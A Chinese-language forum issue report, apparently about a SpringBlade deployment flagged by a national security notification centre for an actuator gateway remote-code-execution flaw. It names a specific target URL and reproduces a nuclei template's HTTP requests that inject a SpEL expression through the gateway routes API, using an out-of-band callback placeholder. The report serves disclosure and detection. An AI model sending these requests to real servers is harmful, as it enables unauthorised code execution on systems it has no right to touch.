一、该问题的重现步骤是什么?
国家网络与信息安全信息通报中心 监测发现SpringBlade api actuator rce
隐患描述 :
漏洞URL:http://clms.baoyinggas.cn/api/actuator/gateway/routes/2bYws4BEWU9eEYgmDz1V0eG1G9G
nuclei -t saber-rce-api_actuator.yaml -u http://clms.baoyinggas.cn/ -dresp
POST /api/actuator/gateway/routes/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/{{randstr}}/**"
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "#{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")}",
"_genkey_1": "/${path}"
}
}
],
"uri": "{{RootURL}}",
"order": 0
}
POST /api/actuator/gateway/refresh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"predicate": "Paths: [/{{randstr}}], match trailing slash: true",
"route_id": "{{randstr}}",
"filters": [
"[[RewritePath #{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")} = /${path}], order = 1]"
],
"uri": "{{RootURL}}",
"order": 0
}
DELETE /api/actuator/gateway/routes/{{randstr}} HTTP/1.1
Host: {{Hostname}}
二、你期待的结果是什么?实际看到的又是什么?
三、你正在使用的是什么产品,什么版本?在什么操作系统上?
四、请提供详细的错误堆栈信息,这很重要。
五、若有更多详细信息,请在下面提供。
扫一扫访问 Blade技术社区 移动端